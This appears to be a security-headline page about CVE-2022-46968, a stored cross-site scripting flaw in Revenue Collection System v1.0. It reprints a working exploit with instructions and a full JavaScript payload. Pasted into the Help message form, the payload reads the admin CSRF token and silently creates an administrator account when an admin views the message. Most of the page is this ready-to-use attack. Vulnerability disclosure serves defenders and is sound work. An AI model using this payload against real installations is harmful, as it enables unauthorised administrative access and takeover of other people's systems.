Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-46968: Revenue Collection System 1.0 Cross Site Scripting

A stored cross-site scripting (XSS) vulnerability in /index.php?page=help of Revenue Collection System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into sent messages.

CVE
#sql#xss#vulnerability#web#linux#apache#java#php#auth
# Exploit Title: Revenue Collection System v1.0 - Authentication Bypass via Stored XSS# Exploit Author: Joe Pollock# Date: November 16, 2022# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip# Tested on: Kali Linux, Apache, Mysql# CVE: T.B.C# Vendor: Kapiya# Version: 1.0# Exploit Description:#   Revenue Collection System v1.0 suffers from a Stored Cross-Site Scripting vulnerability allowing an authenticated #   client user to add an administrative user account to the application then log in as the newly created admin.To reproduce this exploit, log in as a client user then navigate to the 'Help' functionality (/index.php?page=help).The help functionality is used to contact an administrator by sending a message. Paste the Javascript code below into the'Your Message' textbox then click 'Send'. When an administrator views this message, an administrative user account will be added to the application with username "admin_new" and password "Test123Test123". Using these credentials, it should now be possible to log in to the application via the administrative login, here: /admin/login.php (Note: change the'target', 'x_Username', and 'x_Passsword' as required).<script>var target = "http://localhost/rates/admin/usersadd.php";var req = new XMLHttpRequest();req.open("GET", target);req.send();var parser = new DOMParser();resp = req.responseTextvar document = parser.parseFromString(resp, "text/html");var token = document.getElementsByName("token")[0].value;var params = "token="+token+"&t=users&action=insert&&modal=0&x_Fullname=test&x_Username=admin_new&x__Email=test123%40test123.com&x_Passsword=Test123Test123&x_userLevelId=-1";req.open("POST", target);req.withCredentials = true;req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");req.send(params);</script>

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907